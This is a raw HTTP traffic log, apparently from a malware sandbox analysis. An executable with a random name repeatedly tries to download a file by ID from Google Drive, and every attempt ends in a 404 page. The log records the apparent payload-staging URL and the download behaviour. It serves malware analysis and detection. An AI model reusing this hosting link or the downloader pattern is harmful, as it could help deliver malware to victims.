                                                                          2025-01-10 14:38:00 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 57 68 69 42 5a 4d 58 4d 4a 73 53 68 45 4e 72 2d 47 73 46 51 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cWhiBZMXMJsShENr-GsFQA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          64192.168.11.2049810142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:38:10 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:38:10 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:38:10 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-fJO-Ln3HTM1BeBcRjnslRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          65192.168.11.2049811142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:38:11 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:38:11 UTC1851INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC5XJJtrVA6kNHjGAk7wjc16t8MWDfSPpR2BwqlHcwg9ctq4yD-dG1a02ZyxeP2DNeVaJDB1k9g
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:38:11 GMT
                                                                          Content-Security-Policy: script-src 'nonce-JmpaSkKhCT82CkoBuI9M0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:38:11 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 55 55 77 42 6c 35 50 4c 6d 74 4c 52 62 70 76 69 6d 46 58 44 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="pUUwBl5PLmtLRbpvimFXDg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          66192.168.11.2049812142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:38:21 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:38:22 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:38:21 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-YJW5ehhEr_1aI8BG1S_nPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          67192.168.11.2049813142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:38:22 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:38:22 UTC1851INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC4USTthsUGV3EuylFkh-2vBtRRMRvC6AOV7JyO0IW9kDGcc7Nz3811iyd4SSUlZyezBeVPBSoE
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:38:22 GMT
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-f1wcMSF50eix_uAYV4hNAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:38:22 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 6e 39 71 5f 63 4e 4d 74 72 5a 79 37 53 64 70 46 6a 37 69 71 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="In9q_cNMtrZy7SdpFj7iqw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          68192.168.11.2049814142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:38:32 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:38:33 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:38:33 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: script-src 'nonce-7yazehcfmuoxveyamUt91g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          69192.168.11.2049815142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:38:33 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:38:33 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC6VT7SqsEAXFXI3gxlBVIYxVvkTmYV-99KGo9FoVCTCN1ocLk0vaLGYUmzOLOMuNqhg
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:38:33 GMT
                                                                          Content-Security-Policy: script-src 'nonce-ewITGIgRhDbS9Uenfm61xg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:38:33 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 45 55 2d 76 38 51 74 34 64 35 77 31 41 69 68 49 47 4e 4d 4e 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UEU-v8Qt4d5w1AihIGNMNg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          70192.168.11.2049816142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:38:44 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:38:44 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:38:44 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: script-src 'nonce-rthil-GIIY6YoW89wEuFOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          71192.168.11.2049817142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:38:44 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:38:44 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC6u792ajz53euqYAGQY-ZaelbL6ApheVv0IPHtrssMzWXFV8CBBAp_2QCgdUTo85lJ4
                                                                          Content-Type: text/html; charset=utf-8
